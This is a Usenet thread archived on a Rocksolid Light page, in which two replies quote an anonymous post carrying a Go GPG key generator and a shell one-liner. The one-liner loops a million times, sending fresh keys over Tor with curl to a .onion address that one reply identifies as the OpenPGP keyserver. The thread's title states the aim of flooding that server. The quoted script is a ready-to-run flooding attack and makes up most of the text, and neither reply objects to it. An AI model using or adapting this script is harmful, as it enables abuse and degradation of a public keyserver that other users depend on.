Rocksolid Light

News from da outaworlds

mail  files  register  groups  login

Message-ID:  

You seek to shield those you love and you like the role of the provider.


alt / alt.anonymous / Re: fill koo with virtual poo

SubjectAuthor
* Re: fill koo with virtual pooD. Ray
`- Re: fill koo with virtual pooStainless Steel Rat

1
Subject: Re: fill koo with virtual poo
From: D. Ray
Newsgroups: alt.cypherpunks, alt.anonymous
Organization: Usenet.Farm
Date: Wed, 15 May 2024 03:08 UTC
References: 1
Organization: Usenet.Farm
Mime-Version: 1.0
Date: Wed, 15 May 24 03:08:47 UTC
Path: eternal-september.org!news.eternal-september.org!feeder3.eternal-september.org!border-2.nntp.ord.giganews.com!border-1.nntp.ord.giganews.com!nntp.giganews.com!npeer.as286.net!npeer-ng0.as286.net!peer03.ams1!peer.ams1.xlned.com!news.xlned.com!peer02.ams4!peer.am4.highwinds-media.com!news.highwinds-media.com!feeder3.usenet.farm!feeder4.usenet.farm!feed.usenet.farm!news.usenet.farm
Message-Id: <AQtNzhMIfRryNvKmxickxueTTHCbhTSI@news.usenet.farm>
Subject: Re: fill koo with virtual poo
From: d@ray (D. Ray)
Newsgroups: alt.cypherpunks,alt.anonymous
References: <e45e644c0b171473b700ace35ae9790b@dizum.com>
User-Agent: NewsTap/5.5 (iPhone/iPod Touch)
Content-Type: text/plain
X-Ufhash: %2FCscjIXdR8GDT6KnMpc4d4RrK7Oj09%2FT0q0kbTncPB0l8WhzxCcauLxKiFa8s%2Brb69g3RX22bY4o5XXdlis%2FvV7jEhZyDVxG26iTeM2ymchRz2f4GLDTujYHvHAa6Fta0auWm1mq%2BTSkSBvNdAFpKCi0mKoFwDwZwvFmxy4UP589CUqyjKRaYjsrVIMhDcO7pSD0%2BadhywUzEPduK3y6DNzq5Fna1Wibsa4%3D
X-Received-Bytes: 1696
Lines: 30
View all headers

Nomen Nescio <nobody@dizum.com> writes:

> //koo-poo.go - compile, put in /usr/local/bin/, start Tor and run the one-liner at the bottom in a shell.
>
> package main
>
> import (
> "fmt"
> "time"
>
> "github.com/alokmenghrajani/gpgeez"
> )
>
> func main() {
> config := gpgeez.Config{Expiry: 365 * 24 * time.Hour}
> key, err := gpgeez.CreateKey("user name", "a nice comment", "email@address.com", &config)
> if err != nil {
> fmt.Printf("Something went wrong: %v", err)
> return
> }
> output, err := key.Armor()
> if err != nil {
> fmt.Printf("Something went wrong: %v", err)
> return
> }
> fmt.Println(output)
> }
>
> //for run in {1..1000000}; do koo-poo | curl -v --socks5-hostname localhost:9050 -T - http://zkaan2xfbuxia2wpf7ofnkbz6r5zdbbvxbunvp5g2iebopbfc4iqmbad.onion; done

What is it supposed to do? Create million GPG keys?

Subject: Re: fill koo with virtual poo
From: Stainless Steel Rat
Newsgroups: alt.cypherpunks, alt.anonymous
Organization: dizum.com - The Internet Problem Provider
Date: Sat, 25 May 2024 11:52 UTC
References: 1 2
Subject: Re: fill koo with virtual poo
References: <e45e644c0b171473b700ace35ae9790b@dizum.com>
<AQtNzhMIfRryNvKmxickxueTTHCbhTSI@news.usenet.farm>
Message-Id: <20240525115246.337091200A8@fleegle.mixmin.net>
Date: Sat, 25 May 2024 12:52:46 +0100 (BST)
Newsgroups: alt.cypherpunks,alt.anonymous
Author-Supplied-Address: ssr<AT>nym<DOT>mixmin<DOT>net
From: Use-Author-Supplied-Address-Header@[127.1] (Stainless Steel Rat)
Path: eternal-september.org!news.eternal-september.org!feeder3.eternal-september.org!weretis.net!feeder8.news.weretis.net!3.eu.feeder.erje.net!feeder.erje.net!news2.arglkargh.de!alphared!sewer!news.dizum.net!not-for-mail
Organization: dizum.com - The Internet Problem Provider
X-Abuse: abuse@dizum.com
Injection-Info: sewer.dizum.com - 2001::1/128
View all headers

On Wed, 15 May 24 03:08:47 UTC, "D. Ray" <d@ray> said in
Message-ID: <AQtNzhMIfRryNvKmxickxueTTHCbhTSI@news.usenet.farm>:

> Nomen Nescio <nobody@dizum.com> writes:
>
>> //koo-poo.go - compile, put in /usr/local/bin/, start Tor and run the one-liner at the bottom in a shell.
>>
>> package main
>>
>> import (
>> "fmt"
>> "time"
>>
>> "github.com/alokmenghrajani/gpgeez"
>> )
>>
>> func main() {
>> config := gpgeez.Config{Expiry: 365 * 24 * time.Hour}
>> key, err := gpgeez.CreateKey("user name", "a nice comment", "email@address.com", &config)
>> if err != nil {
>> fmt.Printf("Something went wrong: %v", err)
>> return
>> }
>> output, err := key.Armor()
>> if err != nil {
>> fmt.Printf("Something went wrong: %v", err)
>> return
>> }
>> fmt.Println(output)
>> }
>>
>> //for run in {1..1000000}; do koo-poo | curl -v --socks5-hostname localhost:9050 -T - http://zkaan2xfbuxia2wpf7ofnkbz6r5zdbbvxbunvp5g2iebopbfc4iqmbad.onion; done
>
> What is it supposed to do? Create million GPG keys?

Looks like it's designed to generate a shit-ton of GPG keys, and attempt to send them to the OpenPGP keyserver. That .onion address is the OpenPGP keyserver address.

Stainless Steel Rat

1

rocksolid light 0.9.8
clearnet tor